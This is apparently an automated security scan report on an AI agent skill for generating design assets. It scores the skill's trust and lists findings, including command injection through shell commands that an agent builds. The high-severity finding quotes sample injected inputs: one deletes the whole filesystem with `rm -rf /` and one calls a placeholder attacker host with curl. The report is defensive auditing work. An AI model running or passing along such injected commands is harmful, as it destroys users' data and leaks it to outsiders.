Trust Assessment
design-assets received a trust score of 79/100, placing it in the Mostly Trusted category. This skill has passed most security checks with only minor considerations noted.
SkillShield's automated analysis identified 2 findings: 0 critical, 1 high, 1 medium, and 0 low severity. Key findings include Missing required field: name, Command Injection via Unsanitized User Input in Shell Script Execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Command Injection via Unsanitized User Input in Shell Script Execution The skill provides multiple bash scripts and command-line examples (`generate-app-icons.sh`, Android icon generation, `generate-favicons.sh`, ImageMagick, sips). These scripts and commands are designed to operate on user-provided file paths and other parameters. If an AI agent is instructed to execute these commands or scripts and directly interpolates unsanitized user input into the shell command string (e.g., using `subprocess.run(..., shell=True)` without proper escaping), a malicious user could inject arbitrary shell commands. For instance, providing an input like `my_image.png; rm -rf /` or `$(curl http://evil.com/data)` could lead to the execution of `rm -rf /` or data exfiltration by the underlying shell, compromising the system where the agent is running. While variables are quoted *within* the provided scripts, the vulnerability lies in the initial construction of the command by the LLM before the script is invoked. The AI agent must rigorously sanitize and properly escape all user-provided inputs before constructing and executing shell commands. This typically involves using a robust shell escaping mechanism (e.g., `shlex.quote()` in Python) for each argument, or by avoiding `shell=True` and passing arguments as a list to `subprocess.run` or similar functions. Consider using dedicated libraries or APIs for image manipulation instead of direct shell calls where possible, to reduce the attack surface. | LLM | SKILL.md:17 | |
| MEDIUM | Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter. | Static | skills/cmanfre7/design-assets/SKILL.md:1 |
Scan History
Embed Code
[](https://skillshield.io/report/2ff4b3b80e8a1dcf)
Powered by SkillShield